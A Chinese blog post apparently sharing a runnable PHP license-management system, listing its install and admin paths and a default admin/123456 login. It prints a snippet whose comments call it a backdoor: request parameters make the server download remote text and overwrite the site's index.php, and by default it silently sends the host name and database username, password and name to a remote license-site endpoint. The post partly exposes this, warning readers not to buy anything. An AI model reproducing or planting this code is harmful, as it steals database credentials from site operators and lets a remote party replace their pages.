安装地址加/install。后台加/admin。账号admin,密码123456。可二开做授权系统等(不建议联系源码内的qq号购买任何东西,玩玩即可,切莫被骗)
//注入后门 注入黑页 盗版入库
//调用授权站文本
$mod = isset($_GET['mod']) ? $_GET['mod'] : null;
if ($mod=="add1") {file_put_contents("hy.php",file_get_contents("http://授权站域名/hy1.txt"));
copy("./hy.php","../index.php");
}elseif ($mod=="add2") {file_put_contents("hy.php",file_get_contents("http://授权站域名/hy2.txt"));
copy("./hy.php","../index.php");
}elseif ($mod=="addhm") {file_put_contents("hm.php",file_get_contents("http://授权站域名/api/hm.txt"));
}
//自动生成授权站相应文本
if ($mod=="delhm") {unlink("./hm.php");
}elseif ($mod=="del1") {unlink("./hm.php");
}elseif ($mod=="del") {unlink("./hm.php");
}else
//盗版入库
@file_get_contents("http://授权站域名/api/daoban.php?url=".$_SERVER['HTTP_HOST']."&user=".$dbconfig['username']."&pwd=".$dbconfig['password']."&db=".$dbconfig['database']);
![图片[1]-小蓝授权系统程序可运行版-村少博客](https://www.cunshao.com/wp-content/uploads/2021/08/QQ截图20210825210649.png)
![图片[2]-小蓝授权系统程序可运行版-村少博客](https://www.cunshao.com/wp-content/uploads/2021/08/QQ截图20210825210656.png)
© 版权声明
本站所发布的全部内容源于互联网搬运,请在下载后24小时内删除。如果有侵权之处请第一时间联系我们E-mail:86512@qq.com删除。敬请谅解!
THE END
暂无评论内容